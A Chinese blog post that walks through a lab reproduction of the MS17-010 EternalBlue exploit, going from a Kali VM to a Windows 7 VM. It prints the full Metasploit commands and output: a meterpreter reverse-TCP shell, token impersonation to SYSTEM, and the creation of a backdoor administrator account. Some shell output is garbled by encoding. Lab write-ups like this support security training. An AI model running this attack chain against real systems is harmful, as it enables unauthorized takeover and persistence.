MS17010漏洞复现及利用

1 准备环境

win7虚拟机:192.168.225.139

cn_windows_7_ultimate_x64_dvd_x15-66043.iso

kali2020.4:192.168.225.138

kali-linux-2020.4-vmware-amd64.7z

如果ssh连接不到kali主机,执行如下命令:执行sudo /etc/init.d/ssh start,输入kali密码。

2 攻击过程

1、确保网络连通性,使用kali能够ping通win7主机,win7关闭防火墙。密码默认是kali。

sudo su -
ping 192.168.225.139
┌──(kali㉿kali)-[~]
└─$ sudo su -

[sudo] password for kali:

┌──(root💀kali)-[~]
└─# ping 192.168.225.139
PING 192.168.225.139 (192.168.225.139) 56(84) bytes of data.
64 bytes from 192.168.225.139: icmp_seq=1 ttl=128 time=0.647 ms
64 bytes from 192.168.225.139: icmp_seq=2 ttl=128 time=0.646 ms

2、扫描139、445端口

nmap -p 139,445 -Pn 192.168.225.139
┌──(root💀kali)-[~]
└─# nmap -p 139,445 -Pn 192.168.225.139
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-12-13 08:57 EST
Nmap scan report for 192.168.225.139
Host is up (0.0011s latency).

PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:35:B1:CF (VMware)

Nmap done: 1 IP address (1 host up) scanned in 11.47 seconds

3、切到kali,执行msfconsole进入到卡里攻击环境

┌──(kali㉿kali)-[~]
└─$ msfconsole

4、搜索永恒之蓝漏洞攻击程序,并使用

msf6 > search ms17-010
msf6 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce

5、查看攻击程序可使用范围 建议用序号

msf6 > info 2
msf6 > info 2

       Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     Module: exploit/windows/smb/ms17_010_eternalblue
   Platform: Windows
       Arch:
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-03-14

Provided by:
  Sean Dillon <sean.dillon@risksense.com>
  Dylan Davis <dylan.davis@risksense.com>
  Equation Group
  Shadow Brokers
  thelightcosine

Available targets:
  Id  Name
  --  ----
  0   Windows 7 and Server 2008 R2 (x64) All Service Packs

Check supported:
  Yes

Basic options:
  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT          445              yes       The target port (TCP)
  SMBDomain      .                no        (Optional) The Windows domain to use for authentication
  SMBPass                         no        (Optional) The password for the specified username
  SMBUser                         no        (Optional) The username to authenticate as
  VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
  VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Payload information:
  Space: 2000

Description:
  This module is a port of the Equation Group ETERNALBLUE exploit,
  part of the FuzzBunch toolkit released by Shadow Brokers. There is a
  buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is
  calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error
  where a DWORD is subtracted into a WORD. The kernel pool is groomed
  so that overflow is well laid-out to overwrite an SMBv1 buffer.
  Actual RIP hijack is later completed in
  srvnet!SrvNetWskReceiveComplete. This exploit, like the original may
  not trigger 100% of the time, and should be run continuously until
  triggered. It seems like the pool will get hot streaks and need a
  cool down period before the shells rain in again. The module will
  attempt to use Anonymous login, by default, to authenticate to
  perform the exploit. If the user supplies credentials in the
  SMBUser, SMBPass, and SMBDomain options it will use those instead.
  On some systems, this module may cause system instability and
  crashes, such as a BSOD or a reboot. This may be more likely with
  some payloads.

References:
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
  https://cvedetails.com/cve/CVE-2017-0143/
  https://cvedetails.com/cve/CVE-2017-0144/
  https://cvedetails.com/cve/CVE-2017-0145/
  https://cvedetails.com/cve/CVE-2017-0146/
  https://cvedetails.com/cve/CVE-2017-0147/
  https://cvedetails.com/cve/CVE-2017-0148/
  https://github.com/RiskSense-Ops/MS17-010

Also known as:
  ETERNALBLUE

6、使用漏洞攻击程序

msf6 > use 2

msf6 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >

7、设置攻击靶机的IP

set rhosts 10.0.0.128
options

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.225.139
rhosts => 192.168.225.139
msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.225.139  yes       The target host(s), range CIDR identifier, or                                                                                                     hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for auth                                                                                                    entication
   SMBPass                         no        (Optional) The password for the specified use                                                                                                    rname
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit                                                                                                     Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process                                                                                                    , none)
   LHOST     192.168.225.138  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf6 exploit(windows/smb/ms17_010_eternalblue) >

8、确认是否有漏洞,并开始执行攻击程序

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

##以下是正常标志
[*] Meterpreter session 1 opened (10.0.0.129:4444 -> 10.0.0.128:49182 ) at 2022-12-13 20:49:47 +0800
[+] 10.0.0.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.0.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.0.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.225.138:4444
[*] 192.168.225.139:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.225.139:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7600 x64 (64-bit)
[*] 192.168.225.139:445   - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.225.139:445 - Connecting to target for exploitation.
[+] 192.168.225.139:445 - Connection established for exploitation.
[+] 192.168.225.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.225.139:445 - CORE raw buffer dump (25 bytes)
[*] 192.168.225.139:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 192.168.225.139:445 - 0x00000010  61 73 69 63 20 37 36 30 30                       asic 7600
[+] 192.168.225.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.225.139:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.225.139:445 - Sending all but last fragment of exploit packet
[*] 192.168.225.139:445 - Starting non-paged pool grooming
[+] 192.168.225.139:445 - Sending SMBv2 buffers
[+] 192.168.225.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.225.139:445 - Sending final SMBv2 buffers.
[*] 192.168.225.139:445 - Sending last fragment of exploit packet!
[*] 192.168.225.139:445 - Receiving response from exploit packet
[+] 192.168.225.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.225.139:445 - Sending egg to corrupted connection.
[*] 192.168.225.139:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.225.139
[*] Meterpreter session 1 opened (192.168.225.138:4444 -> 192.168.225.139:49179) at 2022-12-13 09:11:35 -0500
[+] 192.168.225.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.225.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.225.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

9、进入靶机docs环境

meterpreter > shell
C:\Windows\system32> ipconfig
C:\Windows\system32> exit

meterpreter > shell
Process 2768 created.
Channel 1 created.
Microsoft Windows [▒汾 6.1.7600]
▒▒Ȩ▒▒▒▒ (c) 2009 Microsoft Corporation▒▒▒▒▒▒▒▒▒▒Ȩ▒▒

C:\Windows\system32>ipconfig
ipconfig

Windows IP ▒▒▒▒


▒▒̫▒▒▒▒▒▒▒▒ Bluetooth ▒▒▒▒▒▒▒:

   ý▒▒״̬  . . . . . . . . . . . . : ý▒▒▒ѶϿ▒
   ▒▒▒▒ض▒▒▒ DNS ▒▒׺ . . . . . . . :

▒▒̫▒▒▒▒▒▒▒▒ ▒▒▒▒▒▒▒:

   ▒▒▒▒ض▒▒▒ DNS ▒▒׺ . . . . . . . : localdomain
   ▒▒▒▒▒▒▒ IPv6 ▒▒ַ. . . . . . . . : fe80::7575:602f:dade:693c%11
   IPv4 ▒▒ַ . . . . . . . . . . . . : 192.168.225.139
   ▒▒▒▒▒▒▒▒  . . . . . . . . . . . . : 255.255.255.0
   Ĭ▒▒▒▒▒. . . . . . . . . . . . . : 192.168.225.2

▒▒▒▒▒▒▒▒▒ isatap.localdomain:

   ý▒▒״̬  . . . . . . . . . . . . : ý▒▒▒ѶϿ▒
   ▒▒▒▒ض▒▒▒ DNS ▒▒׺ . . . . . . . : localdomain

10、提权

meterpreter > use incognito
Loading extension incognito...Success.

meterpreter > list_tokens -u

meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM

C:\Windows\system32>exit
exit
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
WIN-TH6PABRUV1T\snow

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter >

11、添加账户,并添加为管理员组

net user test 123 /add

net localgroup administrators test /add

meterpreter > shell
Process 2864 created.
Channel 2 created.
Microsoft Windows [▒汾 6.1.7600]
▒▒Ȩ▒▒▒▒ (c) 2009 Microsoft Corporation▒▒▒▒▒▒▒▒▒▒Ȩ▒▒

C:\Windows\system32>net user test 123 /add
net user test 123 /add
▒ʻ▒▒Ѿ▒▒▒▒ڡ▒

▒▒▒▒▒ NET HELPMSG 2224 ▒Ի▒ø▒▒İ▒▒▒


C:\Windows\system32>net localgroup administrators test /add
net localgroup administrators test /add
▒▒▒▒ɹ▒▒▒ɡ▒


C:\Windows\system32>

12、在win7上查看添加的用户,在运行对话框中输入“netplwiz”。

 13、退出靶机

C:\Windows\system32>exit
exit
meterpreter >
posted @ 2022-12-13 22:36  冰雪2021  阅读(1309)  评论(0编辑  收藏  举报
// 侧边栏目录 // https://blog-static.cnblogs.com/files/douzujun/marvin.nav.my1502.css